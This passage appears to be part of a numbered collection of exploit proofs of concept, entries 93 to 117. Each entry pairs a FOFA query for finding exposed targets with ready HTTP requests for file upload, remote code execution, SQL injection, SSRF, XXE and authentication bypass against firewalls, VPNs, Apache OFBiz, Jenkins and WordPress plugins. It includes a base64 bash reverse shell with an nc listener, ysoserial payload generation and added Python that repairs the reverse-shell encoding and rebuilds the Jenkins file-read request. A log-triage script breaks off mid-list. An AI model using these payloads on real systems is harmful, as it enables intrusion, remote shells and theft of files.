93. 奇安信 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. 奇安信 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial (a ping to a dnslog domain confirms execution without needing an interactive shell):
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated base64 into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Throwing the command output as the exception message surfaces it in the error response.

Reverse shell
Start a listener on the attacker's machine (Kali):
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 136

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

Caveat: the base64 stage above decodes to bash%20-i%20>&%20/dev/tcp/192.168.40.128/7777%200>&1, that is, with literal %20 where the spaces belong, so re-encode the reverse-shell command yourself rather than pasting it as printed.

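Added example (not from the original article): a Python check for the base64 stage of the {echo,...}|{base64,-d}|{bash,-i} one-liner above. It decodes the stage as printed, reports whether the result is a usable command line (real spaces, no leftover percent-encoding), and builds a correctly encoded replacement. The reverse-shell command string INTENDED_CMD is an assumption made here; it is what the printed payload evidently meant to carry.

```python
import base64
import re

# The String.execute() argument as printed in entry 96 (form-encoded '+' restored to spaces).
PAGE_GROOVY = ("'bash -c {echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}"
               "|{base64,-d}|{bash,-i}'.execute();")

# Assumed here: the command the printed payload evidently meant to run (spaces instead of %20).
INTENDED_CMD = "bash -i >& /dev/tcp/192.168.40.128/7777 0>&1"

B64_STAGE = re.compile(r"\{echo,([A-Za-z0-9+/=]+)\}")


def decode_nospace_payload(groovy_line):
    """Extract the base64 from the {echo,...} stage and return what 'bash -i' will read on stdin."""
    m = B64_STAGE.search(groovy_line)
    if not m:
        raise ValueError("no {echo,<base64>} stage found")
    return base64.b64decode(m.group(1)).decode("utf-8")


def stage_is_sound(groovy_line):
    """True when the decoded stage is a plausible command line: real spaces, no percent-encoding left over."""
    cmd = decode_nospace_payload(groovy_line)
    return " " in cmd and "%" not in cmd


def encode_nospace_payload(shell_cmd):
    """Build the whitespace-free 'bash -c' argument: brace expansion supplies the spaces that
    Runtime.exec would otherwise split on, and base64 keeps whitespace and redirection
    characters out of that single argv element."""
    b64 = base64.b64encode(shell_cmd.encode("utf-8")).decode("ascii")
    return "{echo,%s}|{base64,-d}|{bash,-i}" % b64


def groovy_line_for(shell_cmd):
    """Wrap the encoded stage in the same Groovy one-liner shape the POC uses."""
    return "'bash -c %s'.execute();" % encode_nospace_payload(shell_cmd)


if __name__ == "__main__":
    print("as printed :", decode_nospace_payload(PAGE_GROOVY),
          "->", "ok" if stage_is_sound(PAGE_GROOVY) else "BROKEN")
    fixed = groovy_line_for(INTENDED_CMD)
    print("re-encoded :", decode_nospace_payload(fixed),
          "->", "ok" if stage_is_sound(fixed) else "BROKEN")
```

The same check applies to any no-space payload of this shape: whatever the base64 decodes to is handed verbatim to bash -i, so it must already be a complete shell command line.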
97. OneBlog v2.2.2 Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

PAYLOAD stands for the Shiro rememberMe deserialization cookie, omitted here for length.

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

The script value closes the generated function body early (%7D is "}"), runs Java code through the script engine's Java.type bridge, and reopens a block (%7B) so the saved function still parses.

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

URL-decoded, the body is {"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | echo hello"]}. The param string reaches a shell, so the echo after the pipe runs and "hello" in the response confirms command injection.

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file"; filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

The /api/v1/totp/user-backup-code/../../ prefix is the authentication bypass (CVE-2023-46805) this injection is chained with; %3b is the ";" that terminates the keys-status argument so curl runs as a separate command, and the DNS lookup of the dnslog domain confirms execution.

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

The server fetches the ds:RetrievalMethod URI while processing the signature, so a DNS or HTTP callback to the dnslog domain confirms the SSRF.

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the following XML (a parameter entity that fetches an external DTD, so a callback to the dnslog domain confirms the XXE):
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

The empty token is accepted, so the system status configuration is returned without authentication.

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The injection sits in the query-parameter name rather than its value: the list endpoint builds its WHERE clause from arbitrary parameter names, so the updatexml error returns the database version wrapped in "~". Blade-Auth must be a valid token for the target.

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
The CLI endpoint is driven over two HTTP requests that share a Session UUID: an upload side carrying the framed command and a download side that receives the output. Open the download side first (or in parallel); the server pairs the two by the UUID and the upload side needs that channel to answer on.

POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 57

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response on the download side. The argument @/etc/passwd is expanded by the args4j command parser into the file's contents, so lines of the file leak through the error message and the default-value hint:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

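Added example (not from the original article or the Jenkins project): a Python encoder and decoder for the frames in the upload body above. The frame layout is inferred from those bytes (4-byte big-endian chunk length, 1-byte opcode, then a 2-byte-length-prefixed UTF-8 string); the opcode names ARG, LOCALE, ENCODING and START follow the order of Jenkins' PlainCLIProtocol.Op enum, and the default encoding and locale values are copied from the POC. Rebuilding the request from the arguments "help" and "@/etc/passwd" reproduces the 57 bytes shown, and the parser side shows what a gateway would have to look for: an ARG frame whose text starts with "@", which is the args4j file-expansion trigger behind CVE-2024-23897.

```python
import struct

# Opcode values follow the order of Jenkins' PlainCLIProtocol.Op enum (ARG, LOCALE, ENCODING, START, ...);
# the frame layout itself is inferred from the bytes in the POC above.
OP_ARG, OP_LOCALE, OP_ENCODING, OP_START = 0, 1, 2, 3
OP_NAMES = {OP_ARG: "ARG", OP_LOCALE: "LOCALE", OP_ENCODING: "ENCODING", OP_START: "START"}

# The upload body exactly as printed in entry 109 (57 bytes).
PAGE_BODY = (b"\x00\x00\x00\x06\x00\x00\x04help"
             b"\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd"
             b"\x00\x00\x00\x05\x02\x00\x03GBK"
             b"\x00\x00\x00\x07\x01\x00\x05en_US"
             b"\x00\x00\x00\x00\x03")


def _frame(op, text=None):
    """One frame: 4-byte big-endian chunk length, 1-byte opcode, then the chunk.
    For text-carrying opcodes the chunk is a 2-byte-length-prefixed UTF-8 string (Java writeUTF)."""
    chunk = b""
    if text is not None:
        raw = text.encode("utf-8")
        chunk = struct.pack(">H", len(raw)) + raw
    return struct.pack(">I", len(chunk)) + bytes([op]) + chunk


def build_cli_request(args, encoding="GBK", locale="en_US"):
    """Upload-side body for POST /cli?remoting=false: one ARG frame per CLI argument,
    then ENCODING, LOCALE and a bare START frame (defaults copied from the POC)."""
    body = b"".join(_frame(OP_ARG, a) for a in args)
    return body + _frame(OP_ENCODING, encoding) + _frame(OP_LOCALE, locale) + _frame(OP_START)


def parse_frames(data):
    """Inverse of build_cli_request: return [(opcode name, text or None)]; raise on truncated input."""
    frames, pos = [], 0
    while pos < len(data):
        if pos + 5 > len(data):
            raise ValueError("truncated frame header at offset %d" % pos)
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        op = data[pos + 4]
        chunk = data[pos + 5:pos + 5 + length]
        if len(chunk) != length:
            raise ValueError("truncated frame body at offset %d" % pos)
        text = None
        if length:
            if length < 2:
                raise ValueError("malformed string chunk at offset %d" % pos)
            (slen,) = struct.unpack(">H", chunk[:2])
            text = chunk[2:2 + slen].decode("utf-8")
        frames.append((OP_NAMES.get(op, "OP%d" % op), text))
        pos += 5 + length
    return frames


def file_expansion_args(data):
    """ARG frames whose text starts with '@': args4j expands such an argument into the named
    file's contents, which is the behaviour CVE-2024-23897 abuses. A gateway can reject these."""
    return [text for name, text in parse_frames(data)
            if name == "ARG" and text and text.startswith("@")]


if __name__ == "__main__":
    assert build_cli_request(["help", "@/etc/passwd"]) == PAGE_BODY
    for name, text in parse_frames(PAGE_BODY):
        print(name, text)
    print("file-expansion arguments:", file_expansion_args(PAGE_BODY))
```

For detection at a reverse proxy, parse_frames over the upload body and a check of file_expansion_args is enough; the ENCODING and LOCALE frames are cosmetic and can be anything.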
110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The ..;/ segment is a path-parameter traversal: the access check sees a request under /images/ while the servlet container resolves it to the first-run setup wizard, which then lets a new administrator account be created on an already configured instance.

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

A response delayed by about 6 seconds confirms the time-based injection.

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The link parameter accepts file:// URLs for local file reads and http:// URLs for SSRF.

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: fetch the site's nonce (it is embedded in the page HTML, in the bricksData JavaScript object):
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce and execute the command. The queryEditor string is evaluated as PHP; throwing the command output as an exception surfaces it in the response.
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<nonce from step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

Requests to /wp-admin/ are served only to a logged-in WordPress session; the support_custom_img field is what stores the .php file despite the image/png content type.

117. WordPress LayerSlider plugin SQL injection
Affected versions: 7.9.11 through 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

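Added example (not from the original article): a Python access-log triage script for defenders, covering the request-line indicators from entries 95 through 117 above. It parses combined-format access-log lines, percent-decodes the request target once so that encoded ";" and "..;/" sequences are still caught, and labels each hit with the entry it corresponds to. The lines in SAMPLE_LOG are constructed for this example. Rules match the raw request line as the web server logged it, so indicators that live only in a POST body (the Totolink getSysStatusCfg request, for instance) need request-body logging and are out of scope here.

```python
import re
from urllib.parse import unquote

# Combined/common access-log line: client, ident, user, [time], "METHOD target proto", status, bytes.
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) \[([^\]]+)\] "(\S+) (\S+) (\S+)" (\d{3}) (\S+)')

# Request-line indicators lifted from entries 95-117 above. Each regex runs against
# "METHOD <percent-decoded target>", so path-only and method-specific rules both work.
RULES = [
    ("ofbiz_requirePasswordChange_bypass",  re.compile(r"/webtools/control/\S*\?\S*requirePasswordChange=Y")),
    ("ofbiz_xmlrpc",                        re.compile(r"/webtools/control/xmlrpc")),
    ("spiderflow_function_save",            re.compile(r"^POST /function/save")),
    ("ncast_busiFacade",                    re.compile(r"/classes/common/busiFacade\.php")),
    ("likeshop_formimage_upload",           re.compile(r"^POST /api/file/formimage")),
    ("ivanti_totp_traversal",               re.compile(r"/api/v1/totp/user-backup-code/\.\./")),
    ("ivanti_keys_status_cmdinj",           re.compile(r"/license/keys-status/[^ ]*;")),
    ("ivanti_saml20_ws",                    re.compile(r"/dana-ws/saml20\.ws")),
    ("ivanti_saml_sso_cgi",                 re.compile(r"/dana-na/auth/saml-sso\.cgi")),
    ("springblade_updatexml",               re.compile(r"/api/blade-system/\S*updatexml\s*\(", re.I)),
    ("dtale_web_upload_ssrf",               re.compile(r"/dtale/web-upload\?\S*url=")),
    ("jenkins_cli_remoting_false",          re.compile(r"^POST /cli\?remoting=false")),
    ("semicolon_path_traversal",            re.compile(r"\.\.;/")),
    ("goanywhere_initial_setup",            re.compile(r"/wizard/InitialAccountSetup\.xhtml")),
    ("wp_h5vp_view",                        re.compile(r"rest_route=/h5vp/v1/view")),
    ("wp_notificationx_analytics",          re.compile(r"/wp-json/notificationx/v1/analytics")),
    ("wp_automatic_download",               re.compile(r"wp_automatic=download")),
    ("wp_masterstudy_order_items",          re.compile(r"rest_route=/lms/stm-lms/order/items")),
    ("wp_bricks_render_element",            re.compile(r"/wp-json/bricks/v1/render_element")),
    ("wp_jssupportticket_saveconfiguration", re.compile(r"page=configuration&task=saveconfiguration")),
    ("wp_layerslider_popup_markup",         re.compile(r"action=ls_get_popup_markup")),
    ("time_based_sqli",                     re.compile(r"\bsleep\s*\(", re.I)),
]

# Constructed sample lines for the example (not real traffic); targets mirror the POCs above.
SAMPLE_LOG = [
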